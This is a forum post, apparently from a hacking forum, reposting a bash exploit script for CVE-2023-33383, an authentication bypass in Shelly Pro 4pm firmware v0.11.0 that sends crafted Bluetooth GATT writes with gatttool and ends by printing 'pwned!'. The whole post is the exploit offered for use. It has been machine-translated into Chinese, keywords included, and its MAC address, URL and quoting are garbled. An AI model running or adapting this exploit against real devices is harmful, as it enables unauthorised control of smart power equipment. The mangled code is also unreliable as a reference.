H

Shelly Pro 4pm V0.11.0-身份验证旁路

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#!/bin/bash
#利用标题: Shelly Pro 4pm v0.11.0-身份验证旁路
#Google Dork: NA
#DATE: 2023年8月2日
#利用作者:安全团队[exploitsecurity.io]
#exploit blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-via-an an-an-of-bounds-bounds-read-vulnerability-
#供应商homepage: https://www.shelly.com/
#软件link: NA
#版本:固件V0.11.0(必需)
#在: MacOS/Linux上测试
#CVE : CVE-2023-33383
ifs=
失败=$ false
红色='\ e [31m'
绿色='\ e [92m'
白色='\ e [97m'
endColor='\ e [0m'
substring='连接拒绝'
横幅()
{
清除
echo -e'$ {green} [+] ************************************************************************************************
echo -e'$ {绿色} |作者:安全团队[$ {RED} exploitsecurity.io $ {endColor}] |'
echo -e'$ {绿色} | Description: Shelly Pro 4pm-限制|'
echo -e'$ {绿色} | CVE: CVE-2023-33383 |'
echo -e'$ {green} [+] ************************************************************************************************
echo -e'$ {green} [输入键发送有效载荷] $ {endColor}'
}
横幅
读-s -n 1键
如果['$ key'='x'];然后
出口0;
elif ['$ key'=''];然后
gattout=$(sudo超时5 Gatttool -B C8:F033:9E:883333333333333:3E-主要)
如果[-z' $ gattout'];然后
echo -e'$ {red}连接时间超时$ {endColor}'
出口0;
别的
sudo gatttool -B C8:F03:9E333:883333333333:3E -CHAR -WRITE -REQ -A0x000D -N 00000001 /dev /null 21
echo -ne'$ {green} [发送有效载荷] $ {endColor}'
睡觉1
如果[$? -eq 1];然后
$ failed=$ true
出口0;
fi
sudo gatttool -B C8:F03:9E3:88333333333:3E -CHAR -WRITE -REQ -A0x0008 -N AB /DEV /NULL 21
睡觉1
如果[$? -eq 1];然后
$ failed=$ true
echo -e'$ {red} [** exploit失败**] $ {endColor}'
出口0;
别的
sudo gatttool -B C8:F03:9E333:88333333333:3E -CHAR -WRITE -REQ -A0x0008 -N ABCD /dev /dev /dev /null 21
睡觉1
因为我在{1.5}中

echo -ne'$ {绿色}。
睡觉1
完毕
echo -e'\ n $ {white} [pwned!] $ {endColor}'
fi
fi
fi
 
后退
顶部